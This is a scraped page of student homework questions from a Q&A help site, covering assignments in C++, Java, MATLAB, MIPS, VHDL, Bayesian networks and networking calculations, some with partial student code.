Write a program for keeping a course list for each student in a college. The information about each
student should be kept in an object that contains the student's name and a list of courses completed by
the student. The courses taken by a student are stored as a linked list in which each node contains the
name of a course, the number of units for the course, and the course grade. The program gives a menu
with choices that include adding a student's record, deleting a student's record, adding a single course
record to a student's record, deleting a single course record from a student's record, and printing a
student's record to the screen. The program input should accept the student's name in any combination of
upper- and lowercase letters. A student's record should include the student's GPA (grade point average)
when displayed on the screen. When the user is through with the program, the program should store the
records in a file. The next time the program is run, the records should be read back out of the file,
and the list should be reconstructed. (Ask your instructor if there are any rules about what type of
file you should use.)Note: You can use any type of file that you choose. A text file will be the easiest
to demonstrate that the data is correct.1 answer
- Anonymous askedYou are to create a game of Jumble for your friends to play. You are provided with... Show moreA game of Jumble
You are to create a game of Jumble for your friends to play. You are provided with a dictionary of words to use, ‘dict.txt’. Your program will randomly select a word from the list, scramble it and then allow the user ten attempts to guess the word. If they guess it on or before 10 tries, the game issues a congratulatory message and terminates. If they do not guess it in 10 tries, they are told the word and the program terminates.
Read through the assignment carefully. You may wish to create a smaller dictionary with only a few words in it until your program is functioning – and then plug in the real dictionary file. Your program should run regardless of the number of lines in the dictionary.
You must use the functions specified. I would recommend tackling the problem in the following order. Do not move on until you’re convinced each prior piece is fully functional!
Generating random numbers
Write a function called myrandint. This function will create and return a random integer in the range specified by input arguments low and high. The function will use the rand function. Look through your notes, we’ve written this function more than once in class. A sample function invocation:
% put a random integer between 1 and 10 (inclusive) in variable r
>> r = myrandint(1,10);
Fully test this function. Run it enough times to convince yourself that all values in the range are possible and that no values outside of the range are occurring.
Scrambling words
Write a function scramble_word that takes a string as an input argument. The function randomly scrambles the letters in the string and returns the scrambled word. We’ll discuss an algorithm to accomplish the scrambling in class.
>> word = scramble_word('hello')
word =
lhloe
Because the scrambling is random, a subsequent call will likely produce a different outcome:
>> word = scramble_word('hello')
word =
ohlle • Show less0 answers
- Anonymous asked64-bit word... Show moreA CPU executes instructions at 800 MIPS.
Data can be copied 64 bits at a time, with each
64-bit word copied costing six instructions. If an
incoming frame has to be copied twice, how much
bit rate, at most, of a line can the system handle?
(Assume that all instructions run at the full
800-MIPS rate.) • Show less1 answer
- ElegantGuitar8315 askedA material is tested for cyclic fatigue failure whereby a stress, in MPA, is applied to the material... Show more
A material is tested for cyclic fatigue failure whereby a stress, in MPA, is applied to the material and the number of cycles needed to cause failure is measured. Write a program in C++ that calculates the least squares regression to find the best fit for the data in question. Give the user the choice of using a straight line regression or transforming the data by taking the log of both the x and y data and performing a linear regression on the transformed data. The output from the program should be the intercept and the slope of the regression line as well as the coefficient of determination. Use the data below to test your program:• Show less
N, (Cycles) Stress(Mpa)
1 1100
10 1000
100 925
1000 800
10000 625
100000 550
1000000 4200 answers
- Anonymous asked1 answer
- CarleneGriffiths asked1. Add a delay at the appropriate point in this program to make the... Show moreThere are 2 parts for this Code.
1. Add a delay at the appropriate point in this program to make the binary value displayed change in an easy-to-predict way each time you activate dipswitch 8.
2. Add a 2 second delay in the while loop to slow the counter down. This is enough time to set switch 8 in intervals that causes the LEDs to count up one at a time.
Here is the code to modify:
//RAM variables
char var1; // holds current value of incrementing variable
//function prototypes
void init_PortH_INT(void);
void delay(int); // you figure out where to use it!
//Main Function
void main(){
DDRB = 0xff; // initialize Port B
DDRJ = 2;
PTJ = 0;
init_PortH_INT();
while(1){ // resume auto-incrementing value in var1
var1++;
} /* a repetitive task is performed by main */
}
/***************** function *******************/
#pragma CODE_SEG NON_BANKED
interrupt 25 void PortH_ISR (void){ //(((0x10000-Vporth)/2)-1)
PORTB = var1; // latch current value of var1 to Port B
PIFH |= 0x80; // clear port interrupt flag
}
#pragma CODE_SEG DEFAULT
void init_PortH_INT( ){ // dipswitch 8 becomes FE trig for INT
asm(sei);
DDRH &= ~0x80; // PH7 inputs (dipswitch 8)
PPSH = 0x00; // define FE trigger for INT (PH7, etc.)
PIFH |= 0x80; // clear port INT flag by sending a '1'
PIEH |= 0x80; // enable PH7 for port INT
asm(cli);
}
void delay(int del){ // delay for 'del' msecs
int i,j;
for(i=0; i<del; i++)
for(j=0; j<4000; j++);
}
• Show less1 answer
- Anonymous askedwith 8B/10B before transmitting. Suppose th... Show moreIn 1000BASE-X, a frame of 64 bytes is fi rst block coded
with 8B/10B before transmitting. Suppose the propagation
speed is 2 × 10 8 . What is the frame “length” in
“meters”? (Suppose the cable is 500 m long.) • Show less0 answers
- CarleneGriffiths asked1 answer
- CarleneGriffiths asked7.Write the C statements needed to place the address of an interrupt service routine that is to be c0 answers
- CarleneGriffiths asked9.Use Quartus II to write, compile and simulate a .vhd file that outputs an active-LOW pulse for inp0 answers
- Anonymous askedI need help with the basic setup and action listeners for this. I have to idea how to do GUI and the... Show moreI need help with the basic setup and action listeners for this. I have to idea how to do GUI and the action listeners.
I need to make a basic GUI that has 5 buttons and 2 text fields. 1 button at the top for choosing a file, then a text field for typing a search item, then four buttons that are different types of searches through the file. The last text field will be for output. I don't need the code for the search, i just need the help with basic layout and how to do listeners for this stuff. The file will be read and put into objects which are then put into a container, so i am really searching the container after the file is chosen and read in. I can do all of that, I just need a little help with the GUI aspects. Anyone who gives me some contribution will get lifesaver. I don't want my work done for me, I just want help understanding this. THANKS in advance!! • Show less2 answers
- Anonymous askedWrite the C++ DynArray class. Here is a brief description of all of the class functions that your cl... Show more
Write the C++ DynArray class. Here is a brief description of all of the class functions that your class should include:• Show less
• No-argument constructor – initializes a DynArray object to being empty.
• One-argument constructor – uses dynamic memory allocation to obtain a contiguous block of memory for storing n int values, where n is its argument.
• show – displays the nth element in the DynArray. If the DynArray is empty or if n is an invalid index, this function should generate an error message.
• set – will set the nth element in the DynArray to x, where n is the value of its first argument and x is value of its second argument. If the DynArray is empty or if n is an invalid index, this function should generate an error message.
• expand – will take an existing DynArray and expand its size by its argument, s. Hint: To expand a DynArray, allocate a new, larger block of dynamic memory, copy the values from the old DynArray to the new memory, and deallocate the old memory.
• A destructor to deallocate dynamic memory when a DynArray object passes out of scope.1 answer
- hamadja askedCreate a text file that stores student ID, name, major and GPA (float number between 0 and 4)... Show more
Part I• Show less
Create a text file that stores student ID, name, major and GPA (float number between 0 and 4) for 10 students at least. Your file may look as:
1 James ben CS 3.1
2 Wilson Dixit CE 2.7
……..
And so on.
Part II
Write C++ program that will use the previous program in the following manner.
a. Display all the contents of the file in a formatted fashion (tabular format) with the first row being a title or header row.
b. Display a list of all student’s names whose GPA is less than 2.0.
c. Prompt the user to input a major and your program will print out how many students are studying that major.
d. Your program should display the above options as a menu, where the user will choose the task he wants to carry out. Once the user decides to stop, then your program should allow him to choose exist or stop from the same menu. Your main menu should look as:
Please type in your choice
a. Display file contents
b. List students with low GPA
c. Count students per a given major
d. Stop or exit1 answer
- Anonymous askedWrite a calculator application.
Use a grid layout to arrange buttons for the digits and for the + -... Show moreWrite a calculator application.
Use a grid layout to arrange buttons for the digits and for the + - × ÷ operations.
Add a text field to display the result.
Your main class should be called Calculator.
• Show less2 answers
- GreedyEgg5276 askedThis 1s... Show morep 554
Creating a word counting program
Chapter 9 Pointers
5. getString and getWordCount Function
This 1st part as same as last weeks assignment on which you will build
=================================
Write a function named getString that has a local char array of 80 elements.
The function should ask the user to enter a sentence, and store the sentence
in the array. Then the function should dynamically allocate a char array
just large enough to hold the sentence, plus the null terminator. It should
copy the sentence to the dynamically allocated array, and then return a
pointer to the array. Demonstrate the function in a complete program.
========================================
Now you need to parse the line entered and provide a count of words entered.
For this assignment, a word consists of "white space" surrounding a "sequence of alphanumeric chars".
You may need to reference the ASCII table in your book for "white space" chars. For this "white space"
is space (or blank) and \t, and alphanumeric is uppercase chars A to Z and lowercase a to z and digits 0 to 9
Note: You need to write your own string copy function, not use the standard library version. • Show less1 answer
- Anonymous asked1 answer
- Anonymous askedCritique Lai and Gray's virus prevention mechanism described in Section 19.6.2.2. In particular,... More »0 answers
- Anonymous askeddevelop a lexical analyzer that recognizes only arithmetic expressions, including variable names and... More »0 answers
- Anonymous askedWrite a program that can "encrypt" a word using a Caesar cipher (shifting a character K distance awa... Show moreWrite a program that can "encrypt" a word using a Caesar cipher (shifting a character K distance away). You are essentially manipulating the ASCII value for each character. To "encrypt", simply just add K to the character value. Restrict the valid range to be human readable characters (i.e. ASCII values between 32 and 126, inclusively). The program should allow the user to "encrypt" multiple words.
Example:
Cryptography program!!!
Input a shifting distance that's less than 10: 2
Input a word: Hello
Encrypted word is:
Jgnnq
Do you still want to continue?[y/n]: y
Input a word: World
Encrypted word is:
Yqtnf
Do you still want to continue?[y/n]: N • Show less1 answer
- Anonymous askedHi it seems you do not have Program # 3 on page 598 in the book "Starting Out with Java... More »1 answer
- Anonymous askednalyze and Draw a “Cross Reference Matrix” to identify/show different reports and attributes, wh... More »0 answers
- Anonymous askedYou are a consultant and have been brought in to assist the Southwestern Hospital Group (SHG) with i... Show more1 answer
- Anonymous askedImplement an infinite StackOfObjects class: the elements in the stack are stored in an array named e... Show moreImplement an infinite StackOfObjects class: the elements in the stack are stored in an array named elements. When you create a stack, the array is also created. The no-arg constructor creates an array with the default capacity of 2. The variable size counts the number of elements in the stack, and size – 1 is the index of the element at the top of the stack. The size should be increased if there is a need of more space in the stack.
Implement a push method to push an object into the top of the stack and a pop method to return and remove the top element from the stack. Implement a peep method to return the top element from the stack without deleting it. Implement an isEmpty method to check if the stack contains any elements. Implement an access method for the size field.
All fields should be accessible only from inside the class, while all methods should be accessible from any other class.
Implement an infinite StackOfIntegers that has StackOfObjects as a super class. It also implements an extra method: sumElements to compute the sum of its elements.
Write a comprehensive test (test all methods at least twice) for this stack. Create at least 4 instances of both of these classes StackOfObjects and StackOfIntegers (1 stack of Strings, 1 stack of integers, 1 stack of Rectangles, 1 stack of Circles from the textbook and lecture notes).
Please help! • Show less0 answers
- Anonymous askedIn your local nuclear power station, there is an alarm that senses when a temperature gauge excee... Show more).</p>
<p>a) Draw a Bayesian network for this domain, given that the gauge is more likely to fail when the core temperature gets too high.</p>
<p>b) Is your network a polytree? Why or why not?</p>
<p>c) Suppose there are just two possible actual and measured temperatures, normal and high; the probability that the gauge gives the correct temperature is x when it is working, but y when it is faulty. Give the conditional probability table associated with G.</p>
<p>d) Suppose the alarm works correctly unless it is faulty, in which case it never sounds. Give the conditional probability table associated with A.</p>
<p>e) Suppose the alarm and gauge are working and the alarm sounds. Calculate an expression for the probability that the temperature of the core is too high, in terms of the various conditional probabilities in the network.</p> • Show less0 answers
- Anonymous askeda) Which of the following are assert... Show more
Consider the Bayes net shown in Figure 14.23. (Displayed above)
a) Which of the following are asserted by the network structure?
(i) P(B, I, M) = P(B)P(I)P(M)
(ii) P(J | G) = P(J | G, I)
(iii) P(M | G, B, I) = P(M | G, B, I, J)
b) Calculate the value of P(b, i, not m, g, j).
c) Calculate the probability that someone goest to jail given that they broke the law, have been indicted, and face a politically motivated prosecutor.
d) A context-specific independence allows a variable to be independent of some of its parents given certain values of others. In addition to the usual conditional independences given by the graph structure, what context-specific independences exist in the Bayes net in Figure 14.23? (Displayed above)
e) Suppose we want to add the variable P = PresidentialPardon to the network; draw the new network and briefly explain any links you add.• Show less0 answers
- DirtyPawn7728 asked(a) struct color make_c... Show morestruct color
{
int red;
int green;
int blue;
};
Write the following functions:
(a) struct color make_color(int red, int green, int blue);
Returns a color structure containing the specified red, green, and blue
values. If any argument is less than zero, the corresponding member will
contain zero instead. If any argument is greater than 255, it will contain
255.
(b) int getRed(struct color c);
Return the value of c's red member.
(c) bool equal_color(struct color c1, struct color c2);
Returns true if the two colors corresponding values are equal.
(d) struct color brighter(struct color c);
Returns a color structure that represents a brighter version of the color
c. The struct is identical to c, except that each member has been divided
by 0.7 (with the result truncated to an integer). However, there are three
special cases: (1) If all members of c are zero, the function returns a
color whose members all have the value 3. (2) If any member of c is
greater than 0 but less than 3, it is replaced by 3 before the division by
0.7. (3) If dividing by 0.7 causes a member to exceed 255, it is reduced
to 255.
(e) struct color darker(struct color c);
Returns a color structure that represents a darker version of the color c.
The structure is identical to c, except that each member has been
multipled by 0.7 (with the result truncated to int). • Show less1 answer
- Anonymous askedPrivate Sub btnDisplay_Click(...) Handles... Show moreDetermine the output displayed when the button is clicked.
Private Sub btnDisplay_Click(...) Handles btnDisplay.Click
Dim num As Double = 0
Dim max As Double = -1
Dim prompt As String = “ Enter a nonnegative number. “ & Enter -1 to terminate entering numbers.”
Num = CDbl(Input Box(prompt))
Do While num >= 0
If num > max Then
Max = num
End If
Num = CDbl(InputBox(prompt))
Loop
If max <> -1 Then
MessageBox.Show(“Maximum number: “ & max)
Else
MessageBox.Show(“No numbers were entered.”)
End If
(Assume that the responses are 4, 7, 3, and -1) • Show less1 answer
- Anonymous askedWrite a program to find the largest of five numbers obtained from the user with an input dialog box.1 answer
- Anonymous askeddouble rad_d... Show more#include <iostream>
//#include <cmath>
using namespace std;
double absolute(double num);
double rad_degress(double num1); //declaring functions
double tanInverse(double num2);
int main ()
{
double num;
double input,finalResult;
for(double I=2.0; I<6.0; I+= 1.0)
{
double S0 = I;
double S1 = 0.5 * S0;//guess of initial square root value is half of s0
double S2 = S0;
num=absolute(S1-S2);
while(num> 0.0001)
{
S1= S2;
S2= 0.5*(S1+(S0/S1));
num=absolute(S1-S2);
}//while
//cout I and s2
cout << "The square root of " << S0 << " is " << S2 << endl;
}
for(int i=0;i<3;i++)
{
cout<<"\nEnter a value in radians for finding tan inverse\n";
cin>>input;
finalResult=tanInverse(input); //input for finding tan inverse value
cout<<"Result is "<<finalResult<<" \n";
cout.setf(ios::fixed);
cout.setf(ios::showpoint);
cout.precision(5);
}
system("pause");
return 0;
}//main
double absolute(double num)
{
if(num<0)
num = -num;
return num;
}
double rad_degrees(double num1) // function for converting radians to degrees
{
double num11;
num11 = num1 * (180/3.14159265); // pI = 3.14159265
return num11;
}
double tanInverse(double x) // function for finding tan inverse for a value
{
double T1,Den,power,sign,T2,y;
y=1;
x=absolute(x); // converting the negative value to positive by calling absolute function
x=rad_degrees(x); // coverting the value in degrees inti degrees by calling rad_degrees function
T1=x;
sign=-1;
Den=3;
power=x*x*x;
while(y<4) // executing the while loop for three times
{
T2=T1+sign * (power/Den); // T1=3 and power = x3 and Den=3
power=power*x*x; // next time it will be x5 and x7
sign=(-1) * sign; // alternate + and -
Den = Den + 2; // increase the denominator
T1=absolute(T2); // assigning the T2 to T1
y= y+1;
}
return T1;
}
Use the three functions from assignment 4 but turn each of them into a void function that passes the values by reference. Add two more void functions, one for input of the parameters and one for output of the answers. Add another variable called delta which contains convergence factor. Also print out the number of iterations it took to compute each answer.
The data will be
Tangent Delta
0.17633 .0001
0.36937 .00001
0.57735 .0000001
• Show less0 answers
- DashingTriangle9176 asked/*r... Show more
Problem requirements:
you are required to use and implement following functions in this problem:
/*return the sum of the given data set */
double sumData (double x [ ], int n);
/*return the median of the given data set */
double medianData (double x [ ], int n);
/*return the standard deviation of the given data set */
double stdData (double x [ ], int n);
/*return the range of the given data set*/
double rangeData (double x [ ], int n);
/* Display the frequency distribution in the given rages */
void freqData (data x [ ], int n);
you may define additional functions if needed.
The original data set stored in the array should never be changed as you perform different analyses
in this problem you will implement a menu system managing array of data. your program will ask the user to enter some data (double type) from standard input and store them in an array. Once the array is entered, the following interface will be displayed and user will be asked to choose an option to perform the operation repeatedly untill the last option to quit.
Please select the following operations:
1. Display the data set
2. calculate the Mean and Sum of the data set
3. calculate the Median of the data set
4. Calculate the standard deviation of the data set
5. find range of the data set
6. display a frequency distribution
7. Quit
if user select 1, the data set will be displayed on the screen
if user select 2 or 3, the mean, sum, or median will be calculated and displayed on the screen.if there are odd number of data, the median is the middle value. half of all data are smaller than the median value and half are larger. if there area even numberof data, the median is the average of two middle
if user select 4, the standard deviation of given data set (x1, x2,.....,xn) is calculates by the formula:
standard deviation = sqrt[((Σni=1 (xi)2)/n) - ((Σni=1 xi)/n)2]
if user selects 5, the range of data set is calculated as follows:
range= maximum value - minimum value
if the user selects 6, a frequency distribution printout will be displayed that gives the number of values in the following rages: (-∞,0), [0,10), [10,100), [100, +∞). use a proper format (such as two columns) to display each range and the corresponding frquency count.
if user select7, the program terminates:
if user select an option other than 1 to 6, an error message should be displayed and the program continues.• Show less1 answer
- SourCouch5342 askedThe sales commission for each salesperson at Cars-C... Show morePLEASE, NO HALFWAY SOLVED or UNCOMPLETED ANSWERS.
The sales commission for each salesperson at Cars-Corp. is the
following percentage of his/her total sales:
Total Sales (in US$) Commission
___________________________________________________
sale <= 25000 6%
25000 < sale <= 50000 8%
50000 < sale <= 80000 10%
80000 < sale 12%
Define the file-pointers *Infile_1 and *Outfile_1 and link them to
a given input file salein.dat (which is in the homework/directory;
use cp command to copy this file into your directory)
and the output file commout.dat (which you will create in this
assignment). Use while(fgets()!=NULL) to read all the lines in
salein.dat. For odd number lines (containing full names) sscanf
name and surname, print the full name on the screen and in
the output file commout.dat. For even number lines (with amount of
sale), sscanf sale and calculate the corresponding
commission by using the above table; then print the sale and the
commission on the screen and in the output file commout.dat, as shown
below. Close the opened files.
...................................................................
Your output on the screen and in the commout.dat should look like:
Johnathan Smith
The commission of Mr/Ms Smith is 12026.00, based on the sale of 85900.00
.........................................................................
.........................................................................
.........................................................................
Donna Summer
The commission of Mr/Ms Summer is 1500.00, based on the sale of 25000.00
*A given input file salein.dat*
John Everhart
75900
Paul Evans
95700
Juan Hernandez
45100
Rwanda Jackson
88500
Steve Jhonson
35800
Henry Chen
105000
Tracy Ravad
56000
Scott Peters
98000
Alex Ma
89800
Alma Roberts
34500
Nelson Shah
33800
Steven King
68000
Anne Rice
130000
• Show less2 answers
- Anonymous askedGabriella and Natalia decided to put their culinary skills to commerci... Show moreModel the following challenge:
Gabriella and Natalia decided to put their culinary skills to commercial use. Both were energetic and imaginative, in addition to being talented at food preparation. Moreover, they were both personable and well liked among their friends and neighbors.
Simply Delicious has several customers who request catering services on a regular basis. This business has also irregular customers and those trying the service for the first time. Gabriella and Natalia develop estimates for each job as follows: the type of food, its preparation, and the service are first determined. The job is then priced on a per-serving basis, and this amount is multiplied by the maximum number of expected guests. This information is recorded on a job estimate sheet and then entered into a computer.
Twenty percent of the revenues from each job are earmarked for employee compensation. If more than one employee works a job, the 20 percent is divided among them. Employees are paid every two weeks. Gabriella and Natalia are responsible for purchasing the food supplies. Gabriela keeps track of who works on each job and determines the amounts to be paid to each employee. Natalia takes responsibility for paying all other bills.
All purchases are made on account with various vendors in the area. Gabriela usually pays bills within 30 days of billing unless there is a discount available for early payment
Employees are assigned to each job according to skills and availability. On occasion, additional part-time help is required, but drafting members from the families usually satisfies those needs. Gabriella usually makes job assignments at least one week in advance. When the job is completed, the supervisor (who could be Gabriella, Natalia or an employee) completes a job sheet listing the food used, who worked on the job, and their hours.
• Show less1 answer
- WiseLeg3638 askedmodify the program so that it reports how many positive numbers were entered, and how many negative... Show moremodify the program so that it reports how many positive numbers were entered, and how many negative numbers were entered. It should run like this:
Please enter some numbers (0 to terminate)
3
27
-16
4
6
-1
0
4 positive numbers were entered
2 negative numbers were entered • Show less1 answer
- Anonymous askedReplace each phrase containing "Until" with an equivalent phrase containing "While", and vice versa.... Show moreReplace each phrase containing "Until" with an equivalent phrase containing "While", and vice versa. For instance, the phrase (Until sum = 100) would be replaced by (While sum <> 100).
While (ans = "Y") And (n < 7) • Show less0 answers
- WiseLeg3638 askedmodify the program so it reads numbers from the user until a zero is entered. When finished, the pro... Show moremodify the program so it reads numbers from the user until a zero is entered. When finished, the program returns the number of numbers entered. It should run like this:
Please enter some numbers (0 to terminate)
3
27
-16
4
6
-1
0
6 non-zero numbers were entered • Show less1 answer
- Anonymous asked1 answer
- Anonymous asked1 answer
- ngansoplili askedSuppose you are a project manager in a consulting company that is building a Web-based e-commerce si... More »1 answer
- Anonymous asked*************... Show more********
***##***
**####**
*######*
*######*
**####**
***##***
********
input number :4
**************
******##******
*****####*****
****######****
***########***
**##########**
*############*
*############*
**##########**
***########***
****######****
*****####*****
******##******
**************
input number: 7 • Show less2 answers
- Anonymous askeda) A user requests a Web page that consists of some text and three images. For this page, the client... More »3 answers
- Anonymous askedWrite a graphical Java program that allows clients to book seats on a small airplane. Use JButton ob... Show moreWrite a graphical Java program that allows clients to book seats on a small airplane. Use JButton objects to represent the seats. Display the buttons as a grid of five rows with 3 buttons per row. Assume that initially all seats are available and are labeled Seat 1 through Seat 15.
Create three panels in the application window. Use the top panel to provide instructions to the user, the center panel to display the buttons, and the bottom panel to display an Exit button that will close the window and terminate the program. Use layout managers to arrange the panels and the seat buttons.
When a button of an unassigned seat is clicked, a confirmation dialog box must be displayed. This dialog box must have yes, no, and cancel buttons. If the user clicks the yes button, then the seat button label changes to "Occupied". If the no or cancel buttons are clicked the dialog box closes and no additional action is taken.
When the user clicks a button with an “Occupied” label a message box should be displayed indicating that the seat is already reserved. This dialog box should have an OK button only.
When the last seat has been assigned, a dialog box informing the user that no empty seats remain must be displayed. This dialog box should have an OK button only.
The frame title bar must display a heading that represents the name of your application (for example, Acme Airline Reservation System). • Show less1 answer
- Anonymous askedA) Use adders to implement 2-bit multipliers: Z=X*Y, where X and Y are 2-bit numbers, and Z is 4-bit... Show moreA) Use adders to implement 2-bit multipliers: Z=X*Y, where X and Y are 2-bit numbers, and Z is 4-bit numbers. Draw the circuit and explain.
B) Use VHDL data flow and structural styles to implement the above circuit. • Show less1 answer
- Anonymous askedI'm having trouble writing a program in MIPS that is supposed to take in 4 integer inputs from t... Show moreHi,
I'm having trouble writing a program in MIPS that is supposed to take in 4 integer inputs from the user and make the first two the multiplier and the last two the multiplicand. I am then supposed to multiply (the multiplier and multiplicand) and output to hex.
First of all, how do I combine the first two integers to make the multiplier and the last two the multiplicand? Secondly how would I go about multiplying them together? And lastly how would I print the result in hex?
Code is preferred but any help is appreciated!
• Show less0 answers
- SwiftToast4988 askedWrite a program that dynamically allocates an array large enough to hold a user-defined number of te... More »1 answer
- Anonymous askedI need help with this project. It is creating a triangle. I am sending the instructions and part of... Show more
I need help with this project. It is creating a triangle. I am sending the instructions and part of the code that the instructor wants us to use.
oject: The Triangle Class
If a, b, and c are the lengths of the three sides of a triangle, its area can be calculated as
(s-a)(s-b)(s-c) this is suppose to have the little division type symbol over it
where 2s = a + b + c
ITP 120 - Introduction to Java Programming I
Problem Description:
Design a class named Triangle that extends GeometricObject (code given below). The Triangle.
The toString() method is implemented as follows:
return "Triangle: side1 = " + side1 + " side2 = " + side2 +
" side3 = " + side3 + “ color = “ + getColor() + “ filled =“ + isFilled();
Draw the UML diagram that involves the classes Triangle and GeometricObject. Implement the class. Use the test program (code given below) that creates a Triangle object with sides 1, 1.5, 1, color yellow and filled true, and displays the area, perimeter, color, and whether filled or not.
Analysis:
(Describe the purpose, processing, input and output in your own words.)
Design:
Draw the UML class diagram here
Testing:
Comment out the toString method in the Triangle class and run the program. What is the difference in the output. Explain the difference.
public class DemoTriangle {
public static void main(String[] args) {
Triangle triangle = new Triangle(1, 1.5, 1);
System.out.println(triangle);
triangle.setColor("yellow");
triangle.setFilled(true);
System.out.println("The area is " + triangle.getArea());
System.out.println("The perimeter is " + triangle.getPerimeter());
System.out.println(triangle);
}
}
public class GeometricObject {
private String color = "white";
private boolean filled;
private java.util.Date dateCreated;
/** Construct a default geometric object */
public GeometricObject() {
dateCreated = new java.util.Date();
}
/** Construct a geometric object with the specified color
* and filled value */
public GeometricObject(String Color, boolean filled) {
dateCreated = new java.util.Date();
this.color = color;
this.filled = filled;
}
/** Return color */
public String getColor() {
return color;
}
/** Set a new color */
public void setColor(String color) {
this.color = color;
}
/** Return filled. Since filled is boolean,
its get method is named;
}
}
Public class Triangle extends GeometricObject {
// Implement it
}
Submit the following items:
1 answer
- Your jar file via Blackboard.
- Login Blackboard
- Click on Assignments on the left
- Click on Week 1 Work folder
- Read the instructions there and turn in your jar file.
- This document with answers for analysis, design and testing.
- Anonymous askedWrite a UML model (use-case diagram) for an online telephone directory to replace the phonebook that... More »1 answer
- Anonymous askedConsider the design of an XML database system to store and query a collection of confidential XML do... Show more
Consider the design of an XML database system to store and query a collection of confidential XML documents so that only authorized users can read them. Each XML document is identified by a document id, subject, the content of the document, and a list of keywords to facilitate the search of messages. Messages are organized by categories and each category is identified by a unique category id, the name of the category, and a list of keywords to facilitate the search of categories. An XML document is posted to exactly one category. Each user of the system is identified by a user id,password, name, and email address. If a category is assigned to a user, then the user will be able to read all the XML documents under that category unless we explicitly prohibit that the user cannot read a particular document. A category can be assigned to multiple users and a user can have multiple category assignments.
Part 1Design the database using the ER approach and then create the tables accordingly. Populate the tables so that each table contains at least 10 tuples. Then using Java and SQL, implement the following functionality:• Show less
1. Insert a new user, make sure that each email can be registered at most once.
2. Delete an existing user;
3. Update an existing user by any attribute.
Some simple GUI interfaces are expected for each functionality.0 answers
- Anonymous asked0 answers
- cesareborgia1 askedis stored in a single preci... Show moreGive the hexadecimal memory representation for real number 127.9375 that
is stored in a single precision 32 bit floating point variable. Show
your work for each these steps.
i. Integer & Decimal/Fractional Portion Conversions
ii. Normalized Binary Representation for the Integer & Decimal
Portions Together
iii. Conversion from above to Sign, Exponent, Mantissa portions (1
bit, 8 bit, 23 bits respectively)
iv. Conversion from Binary to Hex
bonus question:
Examine the following code:
#include <stdio.h>
int main ( void ) {
float b = 33554433.0;
printf("%d\n", b);
}
What value is printed and why? Assume a 32 bit single precision float. • Show less1 answer
- DashingCloud9082 askedWrite a program in Java, that reads student scores, gets the best score, and then assigns grades ba... Show more
Write a program in Java, that reads student scores, gets the best score, and then assigns grades based on
the following scheme:
Grade is A if score is >= best -10
Grade is B if score is >= best -20
Grade is C if score is >= best -30
Grade is D if score is >= best -40
Grade is F if score is >= best -50
The program prompts the user to enter the total number of students, then prompts the user to
enter all of the scores, and concludes by displaying the grades.
Here is a sample run:
Enter the number of students: 4
Enter 4 scores: 40 55 70 58
Student 0 scores is 40 and grade is C
Student 1 scores is 55 and grade is B
Student 2 scores is 70 and grade is A
Student 3 scores is 58 and grade is B • Show less1 answer
- PetitePencil421 askedScanner scan = new S... Show more// Name:
// Section:
public class Lab9
{
public static void main(String[] args)
{
Scanner scan = new Scanner(System.in);
int numInts = 0;
int value = 0;
// Declare SIZE_ARR, a final int equal to 10.
// [Add Code Here]
// Declare an int array named iArr with its
// size equal to SIZE_ARR:
// [Add Code Here]
// Write a loop that will loop through until no more
// input is available.
// [Add Code Here]
// Use defensive programming to read in a number
// [Add Code Here]
// Verify that there is enough room to add
// the number read in into the array iArr.
// If not enough room display an error message
// and quit the program.
// [Add Code Here]
// Put the number read in into the array iArr
// [Add Code Here]
// Increment your num ints counter
// [Add Code Here]
// End of file loop
// [Add Code Here]
// Write a second loop that will print out the contents
// of the array as shown in the sample output.
// [Add Code Here]
} // end of main method
} // end of Lab9
It's supposed to read in the .in file. How do I do this! • Show less1 answer
- Anonymous askedBarbara Smith is interviewing candidates to be her secretary, one at a time. After each interview sh... Show moreBarbara Smith is interviewing candidates to be her secretary, one at a time. After each interview she is able to determine the true competence level of the candidate (which can be thought of as some positive real number). However, she needs to make a spot decision whether or not to hire a candidate, before interviewing the remaining ones. If the candidates appear in random order, what is a good hiring strategy for Barbara? Suppose there are n candidates. Barbara decides to interview the ?rst r candidates, noting down their scores but not hiring any of them. Let s be the largest score she records during this time. Then, she starts interviewing the remaining n - r candidates, and hires the ?rst one who scores more than s (if none of them do, then she simply picks the last candidate).
(a) Show that the probability that Barbara ends up with the best secretary is at least r(n - r)/n^2
(b) What is a good setting for r, and what is the probability of success in this case? • Show less0 answers
- Anonymous askedPlease explain each step. My input... Show moreChapter 12 Problem #13 Add option only and with input validation.
Please explain each step. My input validation is not working.
Thanks. • Show less1 answer
- Anonymous asked0 answers
- Anonymous askedYou are the official score keep... Show moreFunction Assignment
Use of user defined functions and Nested-if logic.
You are the official score keeper for the “C” Bowling Association (CBA). You should write a program that will:
A. Input bowler’s name and three (3) scores (0-300 range).
B. Calculate average for that bowler.
C. Assign stars to that bowler based on the following scale:
avg > = 200 – 4 stars
avg 170 to 199 – 3 stars
avg 125 to 109 – 2 stars
avg 100 to 124 – 1 star
avg < 100 – no stars
D. Output the bowlers name, avg. and number of stars earned(the actual appropriate sequence of stars, not just a number).
* Your program must be able to process any number of bowlers.
(Use at least 10 sets of data).
E. Discover which bowler had the highest average.
F. Calculate the average of all the bowlers.
G. Output the answers to steps E & F appropriately labeled.
Steps B, C, D must be written as separate functions. • Show less1 answer
- Anonymous askeda. Design the logic for an application for a company that wants a report containing a breakdown of p... Show morea. Design the logic for an application for a company that wants a report containing a breakdown of payroll by department. Input includes each employee’s last name, first name, department number, hourly salary, and number of hours worked. The output is a list of the seven departments in the company (numbered 1 through 7) and the total gross payroll (rate times hours) for each department.
b. Modify “a” so that the report lists department names as well as numbers. The department names are:
Dept. Num. Department Name
1 Personnel
2 Marketing
3 Manufacturing
4 Computer Services
5 Sales
6 Accounting
7 Shipping
c. Modify the report created in exercise “b” so that it prints a line of information for each employee before printing the department summary at the end of the report. Each detail line must contain the employee’s name, department number, department name, hourly wage, hours worked, gross pay, and withholding tax.
Withholding taxes are based on the following percentages of gross pay:
Weekly Gross Pay ($) Withholding (%)
0.00 – 200.00 10
200.01 – 350.00 14
350.01 – 500.00 18
500.01 – up 22 • Show less0 answers
- Juni3375 askedThe file Parameters.java contains a program to test the variable length method average from Section... Show moreThe file Parameters.java contains a program to test the variable length method average from Section 7.5 of the text. Note
that average must be a static method since it is called from the static method main.
1. Compile and run the program. You must use the -source 1.5 option in your compile command.
2. Add a call to find the average of a single integer, say 13. Print the result of the call.
3. Add a call with an empty parameter list and print the result. Is the behavior what you expected?
4. Add an interactive part to the program. Ask the user to enter a sequence of at most 20 nonnegative integers. Your
program should have a loop that reads the integers into an array and stops when a negative is entered (the negative
